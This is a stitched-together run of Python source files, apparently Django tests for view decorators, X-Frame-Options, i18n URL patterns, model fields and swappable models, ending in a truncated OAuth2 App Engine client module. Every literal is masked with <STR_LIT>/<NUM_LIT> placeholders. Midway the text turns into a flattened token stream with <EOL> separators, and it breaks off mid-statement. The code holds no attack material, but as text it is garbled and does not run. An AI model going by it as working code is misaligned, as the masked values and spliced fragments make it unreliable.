        # Wrapper metadata must survive the full decorator stack.
        self.assertEqual(fully_decorated.__name__, '<STR_LIT>')
        self.assertEqual(fully_decorated.__doc__, '<STR_LIT>')
        self.assertEqual(fully_decorated.__dict__['<STR_LIT>'], '<STR_LIT>')

    def test_user_passes_test_composition(self):
        """<STR_LIT>"""
        # Each test callable records itself; the recorded order proves the
        # decorators compose outermost-first at call time.
        def test1(user):
            user.decorators_applied.append('<STR_LIT>')
            return True

        def test2(user):
            user.decorators_applied.append('<STR_LIT>')
            return True

        def callback(request):
            return request.user.decorators_applied

        callback = user_passes_test(test1)(callback)
        callback = user_passes_test(test2)(callback)

        class DummyUser(object):
            pass

        class DummyRequest(object):
            pass

        request = DummyRequest()
        request.user = DummyUser()
        request.user.decorators_applied = []
        response = callback(request)
        self.assertEqual(response, ['<STR_LIT>', '<STR_LIT>'])

    def test_cache_page_new_style(self):
        """<STR_LIT>"""
        # cache_page(timeout)(view) — the factory calling convention.
        def my_view(request):
            return "<STR_LIT>"
        my_view_cached = cache_page(<NUM_LIT>)(my_view)
        self.assertEqual(my_view_cached(HttpRequest()), "<STR_LIT>")
        my_view_cached2 = cache_page(<NUM_LIT>, key_prefix="<STR_LIT:test>")(my_view)
        self.assertEqual(my_view_cached2(HttpRequest()), "<STR_LIT>")

    def test_cache_page_old_style(self):
        """<STR_LIT>"""
        # Deprecated cache_page(view, timeout) forms still work; the
        # catch_warnings block swallows the deprecation warnings.
        def my_view(request):
            return "<STR_LIT>"
        with warnings.catch_warnings(record=True):
            my_view_cached = cache_page(my_view, <NUM_LIT>)
            self.assertEqual(my_view_cached(HttpRequest()), "<STR_LIT>")
            my_view_cached2 = cache_page(my_view, <NUM_LIT>, key_prefix="<STR_LIT:test>")
            self.assertEqual(my_view_cached2(HttpRequest()), "<STR_LIT>")
            my_view_cached3 = cache_page(my_view)
            self.assertEqual(my_view_cached3(HttpRequest()), "<STR_LIT>")
            my_view_cached4 = cache_page()(my_view)
            self.assertEqual(my_view_cached4(HttpRequest()), "<STR_LIT>")

    def test_require_safe_accepts_only_safe_methods(self):
        """<STR_LIT>"""
        # Two methods pass (the safe ones), three are rejected with
        # HttpResponseNotAllowed. Method names are masked.
        def my_view(request):
            return HttpResponse("<STR_LIT:OK>")
        my_safe_view = require_safe(my_view)
        request = HttpRequest()
        request.method = '<STR_LIT:GET>'
        self.assertTrue(isinstance(my_safe_view(request), HttpResponse))
        request.method = '<STR_LIT>'
        self.assertTrue(isinstance(my_safe_view(request), HttpResponse))
        request.method = '<STR_LIT:POST>'
        self.assertTrue(isinstance(my_safe_view(request), HttpResponseNotAllowed))
        request.method = '<STR_LIT>'
        self.assertTrue(isinstance(my_safe_view(request), HttpResponseNotAllowed))
        request.method = '<STR_LIT>'
        self.assertTrue(isinstance(my_safe_view(request), HttpResponseNotAllowed))


# Fixtures for method_decorator: each function decorator is wrapped so it can
# be applied to instance methods.
def simple_dec(func):
    def wrapper(arg):
        return func("<STR_LIT>" + arg)
    return wraps(func)(wrapper)
simple_dec_m = method_decorator(simple_dec)


def myattr_dec(func):
    def wrapper(*args, **kwargs):
        return func(*args, **kwargs)
    wrapper.myattr = True
    return wraps(func)(wrapper)
myattr_dec_m = method_decorator(myattr_dec)


def myattr2_dec(func):
    def wrapper(*args, **kwargs):
        return func(*args, **kwargs)
    wrapper.myattr2 = True
    return wraps(func)(wrapper)
myattr2_dec_m = method_decorator(myattr2_dec)


class MethodDecoratorTests(TestCase):
    """<STR_LIT>"""

    def test_preserve_signature(self):
        # The wrapped method still receives self correctly.
        class Test(object):
            @simple_dec_m
            def say(self, arg):
                return arg
        self.assertEqual("<STR_LIT>", Test().say("<STR_LIT:hello>"))

    def test_preserve_attributes(self):
        # Attributes set by each wrapper must be visible whether the
        # decorators are applied to a plain function or (via
        # method_decorator) to a method, bound or unbound.
        @myattr_dec
        @myattr2_dec
        def func():
            pass
        self.assertEqual(getattr(func, '<STR_LIT>', False), True)
        self.assertEqual(getattr(func, '<STR_LIT>', False), True)

        class Test(object):
            @myattr_dec_m
            @myattr2_dec_m
            def method(self):
                "<STR_LIT>"
                pass
        self.assertEqual(getattr(Test().method, '<STR_LIT>', False), True)
        self.assertEqual(getattr(Test().method, '<STR_LIT>', False), True)
        self.assertEqual(getattr(Test.method, '<STR_LIT>', False), True)
        self.assertEqual(getattr(Test.method, '<STR_LIT>', False), True)
        self.assertEqual(Test.method.__doc__, '<STR_LIT>')
        self.assertEqual(Test.method.__name__, '<STR_LIT>')


class XFrameOptionsDecoratorsTests(TestCase):
    """<STR_LIT>"""

    def test_deny_decorator(self):
        """<STR_LIT>"""
        @xframe_options_deny
        def a_view(request):
            return HttpResponse()
        r = a_view(HttpRequest())
        self.assertEqual(r['<STR_LIT>'], '<STR_LIT>')

    def test_sameorigin_decorator(self):
        """<STR_LIT>"""
        @xframe_options_sameorigin
        def a_view(request):
            return HttpResponse()
        r = a_view(HttpRequest())
        self.assertEqual(r['<STR_LIT>'], '<STR_LIT>')

    def test_exempt_decorator(self):
        """<STR_LIT>"""
        # The exempt decorator sets no header itself and flags the response
        # so the middleware also leaves it alone.
        @xframe_options_exempt
        def a_view(request):
            return HttpResponse()
        req = HttpRequest()
        resp = a_view(req)
        self.assertEqual(resp.get('<STR_LIT>', None), None)
        self.assertTrue(resp.xframe_options_exempt)
        r = XFrameOptionsMiddleware().process_response(req, resp)
        self.assertEqual(r.get('<STR_LIT>', None), None)
# NOTE(review): literals in this module are masked by a tokenization pass
# (<STR_LIT> placeholders); comments describe structure only.
# URLconf fixture mixing non-prefixed patterns with i18n_patterns
# (language-prefixed), including translatable regexes and a namespaced
# include — presumably for URL translation tests; confirm against the
# test module that sets ROOT_URLCONF to this file.
from django.conf.urls import patterns, include, url
from django.conf.urls.i18n import i18n_patterns
from django.utils.translation import ugettext_lazy as _
from django.views.generic import TemplateView

view = TemplateView.as_view(template_name='<STR_LIT>')

# Patterns outside i18n_patterns get no language prefix; the _() wrapped
# regexes are themselves translatable.
urlpatterns = patterns('<STR_LIT>',
    url(r'<STR_LIT>', view, name='<STR_LIT>'),
    url(_(r'<STR_LIT>'), view, name='<STR_LIT>'),
    url(_(r'<STR_LIT>'), view, name='<STR_LIT>'),
)

# Language-prefixed patterns, including a namespaced include.
urlpatterns += i18n_patterns('<STR_LIT>',
    url(r'<STR_LIT>', view, name='<STR_LIT>'),
    url(r'<STR_LIT>', view, name='<STR_LIT>'),
    url(_(r'<STR_LIT>'), view, name='<STR_LIT>'),
    url(_(r'<STR_LIT>'), include('<STR_LIT>', namespace='<STR_LIT>')),
)
# NOTE(review): literals in this module are masked by a tokenization pass
# (<STR_LIT>/<NUM_LIT> placeholders); comments describe structure only.
# Model-field behavior tests: formfield options, repr, verbose_name,
# DecimalField, DateTime/TimeField microseconds, Boolean/NullBooleanField
# round-trips, choices display, SlugField length, and field validation.
# The module is TRUNCATED at the end of this excerpt (mid-statement).
from __future__ import absolute_import, unicode_literals

import datetime
from decimal import Decimal

from django import test
from django import forms
from django.core.exceptions import ValidationError
from django.db import models
from django.db.models.fields.files import FieldFile
from django.utils import six
from django.utils import unittest

from .models import (Foo, Bar, Whiz, BigD, BigS, Image, BigInt, Post,
    NullBooleanModel, BooleanModel, Document, RenamedField, VerboseNameField,
    FksToBooleans)
from .imagefield import (ImageFieldTests, ImageFieldTwoDimensionsTests,
    TwoImageFieldTests, ImageFieldNoDimensionsTests,
    ImageFieldOneDimensionTests, ImageFieldDimensionsFirstTests,
    ImageFieldUsingFileTests)


class BasicFieldTests(test.TestCase):
    def test_show_hidden_initial(self):
        """<STR_LIT>"""
        # formfield() must forward show_hidden_initial to the form field.
        choices = [(<NUM_LIT:0>, <NUM_LIT:0>), (<NUM_LIT:1>, <NUM_LIT:1>)]
        model_field = models.Field(choices=choices)
        form_field = model_field.formfield(show_hidden_initial=True)
        self.assertTrue(form_field.show_hidden_initial)
        form_field = model_field.formfield(show_hidden_initial=False)
        self.assertFalse(form_field.show_hidden_initial)

    def test_nullbooleanfield_blank(self):
        """<STR_LIT>"""
        # None must be a valid value for a NullBooleanField during
        # full_clean().
        nullboolean = NullBooleanModel(nbfield=None)
        try:
            nullboolean.full_clean()
        except ValidationError as e:
            self.fail("<STR_LIT>" % e.messages)

    def test_field_repr(self):
        """<STR_LIT>"""
        # repr() for both a bound field (from _meta) and an unbound one.
        f = Foo._meta.get_field('<STR_LIT:a>')
        self.assertEqual(repr(f), '<STR_LIT>')
        f = models.fields.CharField()
        self.assertEqual(repr(f), '<STR_LIT>')

    def test_field_name(self):
        """<STR_LIT>"""
        # A field declared with name=... is exposed under that name only.
        instance = RenamedField()
        self.assertTrue(hasattr(instance, '<STR_LIT>'))
        self.assertFalse(hasattr(instance, '<STR_LIT>'))

    def test_field_verbose_name(self):
        # Every numbered field on the fixture model carries the expected
        # (masked) verbose_name; 'id' has the default one.
        m = VerboseNameField
        for i in range(<NUM_LIT:1>, <NUM_LIT>):
            self.assertEqual(m._meta.get_field('<STR_LIT>' % i).verbose_name,
                '<STR_LIT>' % i)
        self.assertEqual(m._meta.get_field('<STR_LIT:id>').verbose_name, '<STR_LIT>')


class DecimalFieldTests(test.TestCase):
    def test_to_python(self):
        f = models.DecimalField(max_digits=<NUM_LIT:4>, decimal_places=<NUM_LIT:2>)
        self.assertEqual(f.to_python(<NUM_LIT:3>), Decimal("<STR_LIT:3>"))
        self.assertEqual(f.to_python("<STR_LIT>"), Decimal("<STR_LIT>"))
        # Non-numeric input raises ValidationError, not decimal errors.
        self.assertRaises(ValidationError, f.to_python, "<STR_LIT:abc>")

    def test_default(self):
        f = models.DecimalField(default=Decimal("<STR_LIT>"))
        self.assertEqual(f.get_default(), Decimal("<STR_LIT>"))

    def test_format(self):
        f = models.DecimalField(max_digits=<NUM_LIT:5>, decimal_places=<NUM_LIT:1>)
        self.assertEqual(f._format(f.to_python(<NUM_LIT:2>)), '<STR_LIT>')
        self.assertEqual(f._format(f.to_python('<STR_LIT>')), '<STR_LIT>')
        # None passes through _format unchanged.
        self.assertEqual(f._format(None), None)

    def test_get_db_prep_lookup(self):
        from django.db import connection
        f = models.DecimalField(max_digits=<NUM_LIT:5>, decimal_places=<NUM_LIT:1>)
        self.assertEqual(f.get_db_prep_lookup('<STR_LIT>', None, connection=connection), [None])

    def test_filter_with_strings(self):
        """<STR_LIT>"""
        Foo.objects.create(id=<NUM_LIT:1>, a='<STR_LIT:abc>', d=Decimal("<STR_LIT>"))
        self.assertEqual(list(Foo.objects.filter(d='<STR_LIT>')), [])

    def test_save_without_float_conversion(self):
        """<STR_LIT>"""
        # The decimal must round-trip through the DB without being coerced
        # through float.
        bd = BigD(d="<STR_LIT>")
        bd.save()
        bd = BigD.objects.get(pk=bd.pk)
        self.assertEqual(bd.d, Decimal("<STR_LIT>"))

    def test_lookup_really_big_value(self):
        """<STR_LIT>"""
        # Must not raise — only that the query builds/executes is asserted.
        Foo.objects.filter(d__gte=<NUM_LIT>)


class ForeignKeyTests(test.TestCase):
    def test_callable_default(self):
        """<STR_LIT>"""
        # Bar's FK default is presumably a callable resolving to this Foo —
        # confirm against the fixture models.
        a = Foo.objects.create(id=<NUM_LIT:1>, a='<STR_LIT:abc>', d=Decimal("<STR_LIT>"))
        b = Bar.objects.create(b="<STR_LIT>")
        self.assertEqual(b.a, a)


class DateTimeFieldTests(unittest.TestCase):
    def test_datetimefield_to_python_usecs(self):
        """<STR_LIT>"""
        # Both full and short microsecond strings must parse correctly.
        f = models.DateTimeField()
        self.assertEqual(f.to_python('<STR_LIT>'),
            datetime.datetime(<NUM_LIT>, <NUM_LIT:1>, <NUM_LIT:2>, <NUM_LIT:3>, <NUM_LIT:4>, <NUM_LIT:5>, <NUM_LIT:6>))
        self.assertEqual(f.to_python('<STR_LIT>'),
            datetime.datetime(<NUM_LIT>, <NUM_LIT:1>, <NUM_LIT:2>, <NUM_LIT:3>, <NUM_LIT:4>, <NUM_LIT:5>, <NUM_LIT>))

    def test_timefield_to_python_usecs(self):
        """<STR_LIT>"""
        f = models.TimeField()
        self.assertEqual(f.to_python('<STR_LIT>'),
            datetime.time(<NUM_LIT:1>, <NUM_LIT:2>, <NUM_LIT:3>, <NUM_LIT:4>))
        self.assertEqual(f.to_python('<STR_LIT>'),
            datetime.time(<NUM_LIT:1>, <NUM_LIT:2>, <NUM_LIT:3>, <NUM_LIT>))


class BooleanFieldTests(unittest.TestCase):
    def _test_get_db_prep_lookup(self, f):
        # Shared assertions: truthy inputs map to [True], falsy to [False],
        # None passes through — for both BooleanField and NullBooleanField.
        from django.db import connection
        self.assertEqual(f.get_db_prep_lookup('<STR_LIT>', True, connection=connection), [True])
        self.assertEqual(f.get_db_prep_lookup('<STR_LIT>', '<STR_LIT:1>', connection=connection), [True])
        self.assertEqual(f.get_db_prep_lookup('<STR_LIT>', <NUM_LIT:1>, connection=connection), [True])
        self.assertEqual(f.get_db_prep_lookup('<STR_LIT>', False, connection=connection), [False])
        self.assertEqual(f.get_db_prep_lookup('<STR_LIT>', '<STR_LIT:0>', connection=connection), [False])
        self.assertEqual(f.get_db_prep_lookup('<STR_LIT>', <NUM_LIT:0>, connection=connection), [False])
        self.assertEqual(f.get_db_prep_lookup('<STR_LIT>', None, connection=connection), [None])

    def _test_to_python(self, f):
        # to_python coerces ints to real bools (identity-checked).
        self.assertTrue(f.to_python(<NUM_LIT:1>) is True)
        self.assertTrue(f.to_python(<NUM_LIT:0>) is False)

    def test_booleanfield_get_db_prep_lookup(self):
        self._test_get_db_prep_lookup(models.BooleanField())

    def test_nullbooleanfield_get_db_prep_lookup(self):
        self._test_get_db_prep_lookup(models.NullBooleanField())

    def test_booleanfield_to_python(self):
        self._test_to_python(models.BooleanField())

    def test_nullbooleanfield_to_python(self):
        self._test_to_python(models.NullBooleanField())

    def test_booleanfield_choices_blank(self):
        """<STR_LIT>"""
        # A null=True BooleanField with choices gets a blank option in its
        # form field; null=False does not.
        choices = [(<NUM_LIT:1>, '<STR_LIT>'), (<NUM_LIT:2>, '<STR_LIT>')]
        f = models.BooleanField(choices=choices, default=<NUM_LIT:1>, null=True)
        self.assertEqual(f.formfield().choices, [('<STR_LIT>', '<STR_LIT>')] + choices)
        f = models.BooleanField(choices=choices, default=<NUM_LIT:1>, null=False)
        self.assertEqual(f.formfield().choices, choices)

    def test_return_type(self):
        # Values fetched from the DB come back as real Python bools for both
        # field types; a pk selected via extra() must NOT be a bool.
        b = BooleanModel()
        b.bfield = True
        b.save()
        b2 = BooleanModel.objects.get(pk=b.pk)
        self.assertTrue(isinstance(b2.bfield, bool))
        self.assertEqual(b2.bfield, True)
        b3 = BooleanModel()
        b3.bfield = False
        b3.save()
        b4 = BooleanModel.objects.get(pk=b3.pk)
        self.assertTrue(isinstance(b4.bfield, bool))
        self.assertEqual(b4.bfield, False)
        b = NullBooleanModel()
        b.nbfield = True
        b.save()
        b2 = NullBooleanModel.objects.get(pk=b.pk)
        self.assertTrue(isinstance(b2.nbfield, bool))
        self.assertEqual(b2.nbfield, True)
        b3 = NullBooleanModel()
        b3.nbfield = False
        b3.save()
        b4 = NullBooleanModel.objects.get(pk=b3.pk)
        self.assertTrue(isinstance(b4.nbfield, bool))
        self.assertEqual(b4.nbfield, False)
        b5 = BooleanModel.objects.all().extra(
            select={'<STR_LIT>': '<STR_LIT:string>'})[<NUM_LIT:0>]
        self.assertFalse(isinstance(b5.pk, bool))

    def test_select_related(self):
        """<STR_LIT>"""
        # Boolean conversion must also apply to fields fetched through
        # select_related() joins (explicit and implicit).
        bmt = BooleanModel.objects.create(bfield=True)
        bmf = BooleanModel.objects.create(bfield=False)
        nbmt = NullBooleanModel.objects.create(nbfield=True)
        nbmf = NullBooleanModel.objects.create(nbfield=False)
        m1 = FksToBooleans.objects.create(bf=bmt, nbf=nbmt)
        m2 = FksToBooleans.objects.create(bf=bmf, nbf=nbmf)
        ma = FksToBooleans.objects.select_related('<STR_LIT>').get(pk=m1.id)
        self.assertIsInstance(ma.bf.bfield, bool)
        self.assertIsInstance(ma.nbf.nbfield, bool)
        self.assertEqual(ma.bf.bfield, True)
        self.assertEqual(ma.nbf.nbfield, True)
        mb = FksToBooleans.objects.select_related().get(pk=m1.id)
        mc = FksToBooleans.objects.select_related().get(pk=m2.id)
        self.assertIsInstance(mb.bf.bfield, bool)
        self.assertIsInstance(mb.nbf.nbfield, bool)
        self.assertIsInstance(mc.bf.bfield, bool)
        self.assertIsInstance(mc.nbf.nbfield, bool)
        self.assertEqual(mb.bf.bfield, True)
        self.assertEqual(mb.nbf.nbfield, True)
        self.assertEqual(mc.bf.bfield, False)
        self.assertEqual(mc.nbf.nbfield, False)


class ChoicesTests(test.TestCase):
    def test_choices_and_field_display(self):
        """<STR_LIT>"""
        # get_FOO_display(): known choices map to labels; unknown values and
        # None fall through unchanged.
        self.assertEqual(Whiz(c=<NUM_LIT:1>).get_c_display(), '<STR_LIT>')
        self.assertEqual(Whiz(c=<NUM_LIT:0>).get_c_display(), '<STR_LIT>')
        self.assertEqual(Whiz(c=<NUM_LIT:9>).get_c_display(), <NUM_LIT:9>)
        self.assertEqual(Whiz(c=None).get_c_display(), None)
        self.assertEqual(Whiz(c='<STR_LIT>').get_c_display(), '<STR_LIT>')


class SlugFieldTests(test.TestCase):
    def test_slugfield_max_length(self):
        """<STR_LIT>"""
        # A maximum-length slug must survive a DB round-trip intact.
        bs = BigS.objects.create(s='<STR_LIT>' * <NUM_LIT:50>)
        bs = BigS.objects.get(pk=bs.pk)
        self.assertEqual(bs.s, '<STR_LIT>' * <NUM_LIT:50>)


class ValidationTest(test.TestCase):
    def test_charfield_raises_error_on_empty_string(self):
        f = models.CharField()
        self.assertRaises(ValidationError, f.clean, "<STR_LIT>", None)

    def test_charfield_cleans_empty_string_when_blank_true(self):
        f = models.CharField(blank=True)
        self.assertEqual('<STR_LIT>', f.clean('<STR_LIT>', None))

    def test_integerfield_cleans_valid_string(self):
        # NOTE(review): the excerpt is TRUNCATED here mid-statement; the
        # dangling fragment below is preserved exactly as found.
        f = models.
IntegerField ( ) <EOL> self . assertEqual ( <NUM_LIT:2> , f . clean ( '<STR_LIT:2>' , None ) ) <EOL> def test_integerfield_raises_error_on_invalid_intput ( self ) : <EOL> f = models . IntegerField ( ) <EOL> self . assertRaises ( ValidationError , f . clean , "<STR_LIT:a>" , None ) <EOL> def test_charfield_with_choices_cleans_valid_choice ( self ) : <EOL> f = models . CharField ( max_length = <NUM_LIT:1> , choices = [ ( '<STR_LIT:a>' , '<STR_LIT:A>' ) , ( '<STR_LIT:b>' , '<STR_LIT:B>' ) ] ) <EOL> self . assertEqual ( '<STR_LIT:a>' , f . clean ( '<STR_LIT:a>' , None ) ) <EOL> def test_charfield_with_choices_raises_error_on_invalid_choice ( self ) : <EOL> f = models . CharField ( choices = [ ( '<STR_LIT:a>' , '<STR_LIT:A>' ) , ( '<STR_LIT:b>' , '<STR_LIT:B>' ) ] ) <EOL> self . assertRaises ( ValidationError , f . clean , "<STR_LIT>" , None ) <EOL> def test_choices_validation_supports_named_groups ( self ) : <EOL> f = models . IntegerField ( choices = ( ( '<STR_LIT>' , ( ( <NUM_LIT:10> , '<STR_LIT:A>' ) , ( <NUM_LIT:20> , '<STR_LIT:B>' ) ) ) , ( <NUM_LIT:30> , '<STR_LIT:C>' ) ) ) <EOL> self . assertEqual ( <NUM_LIT:10> , f . clean ( <NUM_LIT:10> , None ) ) <EOL> def test_nullable_integerfield_raises_error_with_blank_false ( self ) : <EOL> f = models . IntegerField ( null = True , blank = False ) <EOL> self . assertRaises ( ValidationError , f . clean , None , None ) <EOL> def test_nullable_integerfield_cleans_none_on_null_and_blank_true ( self ) : <EOL> f = models . IntegerField ( null = True , blank = True ) <EOL> self . assertEqual ( None , f . clean ( None , None ) ) <EOL> def test_integerfield_raises_error_on_empty_input ( self ) : <EOL> f = models . IntegerField ( null = False ) <EOL> self . assertRaises ( ValidationError , f . clean , None , None ) <EOL> self . assertRaises ( ValidationError , f . clean , '<STR_LIT>' , None ) <EOL> def test_integerfield_validates_zero_against_choices ( self ) : <EOL> f = models . 
IntegerField ( choices = ( ( <NUM_LIT:1> , <NUM_LIT:1> ) , ) ) <EOL> self . assertRaises ( ValidationError , f . clean , '<STR_LIT:0>' , None ) <EOL> def test_charfield_raises_error_on_empty_input ( self ) : <EOL> f = models . CharField ( null = False ) <EOL> self . assertRaises ( ValidationError , f . clean , None , None ) <EOL> def test_datefield_cleans_date ( self ) : <EOL> f = models . DateField ( ) <EOL> self . assertEqual ( datetime . date ( <NUM_LIT> , <NUM_LIT:10> , <NUM_LIT:10> ) , f . clean ( '<STR_LIT>' , None ) ) <EOL> def test_boolean_field_doesnt_accept_empty_input ( self ) : <EOL> f = models . BooleanField ( ) <EOL> self . assertRaises ( ValidationError , f . clean , None , None ) <EOL> class BigIntegerFieldTests ( test . TestCase ) : <EOL> def test_limits ( self ) : <EOL> maxval = <NUM_LIT> <EOL> minval = - maxval - <NUM_LIT:1> <EOL> BigInt . objects . create ( value = maxval ) <EOL> qs = BigInt . objects . filter ( value__gte = maxval ) <EOL> self . assertEqual ( qs . count ( ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( qs [ <NUM_LIT:0> ] . value , maxval ) <EOL> BigInt . objects . create ( value = minval ) <EOL> qs = BigInt . objects . filter ( value__lte = minval ) <EOL> self . assertEqual ( qs . count ( ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( qs [ <NUM_LIT:0> ] . value , minval ) <EOL> def test_types ( self ) : <EOL> b = BigInt ( value = <NUM_LIT:0> ) <EOL> self . assertTrue ( isinstance ( b . value , six . integer_types ) ) <EOL> b . save ( ) <EOL> self . assertTrue ( isinstance ( b . value , six . integer_types ) ) <EOL> b = BigInt . objects . all ( ) [ <NUM_LIT:0> ] <EOL> self . assertTrue ( isinstance ( b . value , six . integer_types ) ) <EOL> def test_coercing ( self ) : <EOL> BigInt . objects . create ( value = '<STR_LIT>' ) <EOL> b = BigInt . objects . get ( value = '<STR_LIT>' ) <EOL> self . assertEqual ( b . value , <NUM_LIT:10> ) <EOL> class TypeCoercionTests ( test . 
TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_lookup_integer_in_charfield ( self ) : <EOL> self . assertEqual ( Post . objects . filter ( title = <NUM_LIT:9> ) . count ( ) , <NUM_LIT:0> ) <EOL> def test_lookup_integer_in_textfield ( self ) : <EOL> self . assertEqual ( Post . objects . filter ( body = <NUM_LIT> ) . count ( ) , <NUM_LIT:0> ) <EOL> class FileFieldTests ( unittest . TestCase ) : <EOL> def test_clearable ( self ) : <EOL> """<STR_LIT>""" <EOL> d = Document ( myfile = '<STR_LIT>' ) <EOL> self . assertEqual ( d . myfile , '<STR_LIT>' ) <EOL> field = d . _meta . get_field ( '<STR_LIT>' ) <EOL> field . save_form_data ( d , False ) <EOL> self . assertEqual ( d . myfile , '<STR_LIT>' ) <EOL> def test_unchanged ( self ) : <EOL> """<STR_LIT>""" <EOL> d = Document ( myfile = '<STR_LIT>' ) <EOL> self . assertEqual ( d . myfile , '<STR_LIT>' ) <EOL> field = d . _meta . get_field ( '<STR_LIT>' ) <EOL> field . save_form_data ( d , None ) <EOL> self . assertEqual ( d . myfile , '<STR_LIT>' ) <EOL> def test_changed ( self ) : <EOL> """<STR_LIT>""" <EOL> d = Document ( myfile = '<STR_LIT>' ) <EOL> self . assertEqual ( d . myfile , '<STR_LIT>' ) <EOL> field = d . _meta . get_field ( '<STR_LIT>' ) <EOL> field . save_form_data ( d , '<STR_LIT>' ) <EOL> self . assertEqual ( d . myfile , '<STR_LIT>' ) </s>
<s> from __future__ import absolute_import , unicode_literals <EOL> from django . utils . six import StringIO <EOL> from django . contrib . auth . models import Permission <EOL> from django . contrib . contenttypes . models import ContentType <EOL> from django . core import management <EOL> from django . db . models . loading import cache <EOL> from django . test import TestCase <EOL> from django . test . utils import override_settings <EOL> from regressiontests . swappable_models . models import Article <EOL> class SwappableModelTests ( TestCase ) : <EOL> def setUp ( self ) : <EOL> cache . _get_models_cache . clear ( ) <EOL> def tearDown ( self ) : <EOL> cache . _get_models_cache . clear ( ) <EOL> @ override_settings ( TEST_ARTICLE_MODEL = '<STR_LIT>' ) <EOL> def test_generated_data ( self ) : <EOL> "<STR_LIT>" <EOL> Permission . objects . filter ( content_type__app_label = '<STR_LIT>' ) . delete ( ) <EOL> ContentType . objects . filter ( app_label = '<STR_LIT>' ) . delete ( ) <EOL> new_io = StringIO ( ) <EOL> management . call_command ( '<STR_LIT>' , load_initial_data = False , interactive = False , stdout = new_io ) <EOL> apps_models = [ ( p . content_type . app_label , p . content_type . model ) <EOL> for p in Permission . objects . all ( ) ] <EOL> self . assertIn ( ( '<STR_LIT>' , '<STR_LIT>' ) , apps_models ) <EOL> self . assertNotIn ( ( '<STR_LIT>' , '<STR_LIT>' ) , apps_models ) <EOL> apps_models = [ ( ct . app_label , ct . model ) <EOL> for ct in ContentType . objects . all ( ) ] <EOL> self . assertIn ( ( '<STR_LIT>' , '<STR_LIT>' ) , apps_models ) <EOL> self . assertNotIn ( ( '<STR_LIT>' , '<STR_LIT>' ) , apps_models ) <EOL> @ override_settings ( TEST_ARTICLE_MODEL = '<STR_LIT>' ) <EOL> def test_case_insensitive ( self ) : <EOL> "<STR_LIT>" <EOL> try : <EOL> Article . objects . all ( ) <EOL> except AttributeError : <EOL> self . fail ( '<STR_LIT>' ) <EOL> self . assertIsNone ( Article . _meta . swapped ) </s>
<s> from django . http import HttpResponse <EOL> from django . views . generic import RedirectView <EOL> from django . core . urlresolvers import reverse_lazy <EOL> from django . contrib . auth . decorators import user_passes_test <EOL> def empty_view ( request , * args , ** kwargs ) : <EOL> return HttpResponse ( '<STR_LIT>' ) <EOL> def kwargs_view ( request , arg1 = <NUM_LIT:1> , arg2 = <NUM_LIT:2> ) : <EOL> return HttpResponse ( '<STR_LIT>' ) <EOL> def absolute_kwargs_view ( request , arg1 = <NUM_LIT:1> , arg2 = <NUM_LIT:2> ) : <EOL> return HttpResponse ( '<STR_LIT>' ) <EOL> def defaults_view ( request , arg1 , arg2 ) : <EOL> pass <EOL> def erroneous_view ( request ) : <EOL> import non_existent <EOL> def pass_resolver_match_view ( request , * args , ** kwargs ) : <EOL> response = HttpResponse ( '<STR_LIT>' ) <EOL> response . resolver_match = request . resolver_match <EOL> return response <EOL> uncallable = "<STR_LIT>" <EOL> class ViewClass ( object ) : <EOL> def __call__ ( self , request , * args , ** kwargs ) : <EOL> return HttpResponse ( '<STR_LIT>' ) <EOL> view_class_instance = ViewClass ( ) <EOL> class LazyRedirectView ( RedirectView ) : <EOL> url = reverse_lazy ( '<STR_LIT>' ) <EOL> @ user_passes_test ( lambda u : u . is_authenticated ( ) , login_url = reverse_lazy ( '<STR_LIT>' ) ) <EOL> def login_required_view ( request ) : <EOL> return HttpResponse ( '<STR_LIT>' ) <EOL> def bad_view ( request , * args , ** kwargs ) : <EOL> raise ValueError ( "<STR_LIT>" ) </s>
<s> from __future__ import absolute_import <EOL> from . debug import ( DebugViewTests , ExceptionReporterTests , <EOL> ExceptionReporterTests , PlainTextReportTests , ExceptionReporterFilterTests , <EOL> AjaxResponseExceptionReporterFilter ) <EOL> from . defaults import DefaultsTests <EOL> from . i18n import JsI18NTests , I18NTests , JsI18NTestsMultiPackage , JavascriptI18nTests <EOL> from . shortcuts import ShortcutTests <EOL> from . specials import URLHandling <EOL> from . static import StaticHelperTest , StaticUtilsTests , StaticTests </s>
<s> """<STR_LIT>""" <EOL> __author__ = '<STR_LIT>' <EOL> import base64 <EOL> import httplib2 <EOL> import logging <EOL> import pickle <EOL> import time <EOL> import clientsecrets <EOL> from anyjson import simplejson <EOL> from client import AccessTokenRefreshError <EOL> from client import AssertionCredentials <EOL> from client import Credentials <EOL> from client import Flow <EOL> from client import OAuth2WebServerFlow <EOL> from client import Storage <EOL> from google . appengine . api import memcache <EOL> from google . appengine . api import users <EOL> from google . appengine . api . app_identity import app_identity <EOL> from google . appengine . ext import db <EOL> from google . appengine . ext import webapp <EOL> from google . appengine . ext . webapp . util import login_required <EOL> from google . appengine . ext . webapp . util import run_wsgi_app <EOL> OAUTH2CLIENT_NAMESPACE = '<STR_LIT>' <EOL> class InvalidClientSecretsError ( Exception ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class AppAssertionCredentials ( AssertionCredentials ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , scope , <EOL> audience = '<STR_LIT>' , <EOL> assertion_type = '<STR_LIT>' , <EOL> token_uri = '<STR_LIT>' , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> self . scope = scope <EOL> self . audience = audience <EOL> self . app_name = app_identity . get_service_account_name ( ) <EOL> super ( AppAssertionCredentials , self ) . __init__ ( <EOL> assertion_type , <EOL> None , <EOL> token_uri ) <EOL> @ classmethod <EOL> def from_json ( cls , json ) : <EOL> data = simplejson . loads ( json ) <EOL> retval = AccessTokenCredentials ( <EOL> data [ '<STR_LIT>' ] , <EOL> data [ '<STR_LIT>' ] , <EOL> data [ '<STR_LIT>' ] , <EOL> data [ '<STR_LIT>' ] ) <EOL> return retval <EOL> def _generate_assertion ( self ) : <EOL> header = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> now = int ( time . time ( ) ) <EOL> claims = { <EOL> '<STR_LIT>' : self . 
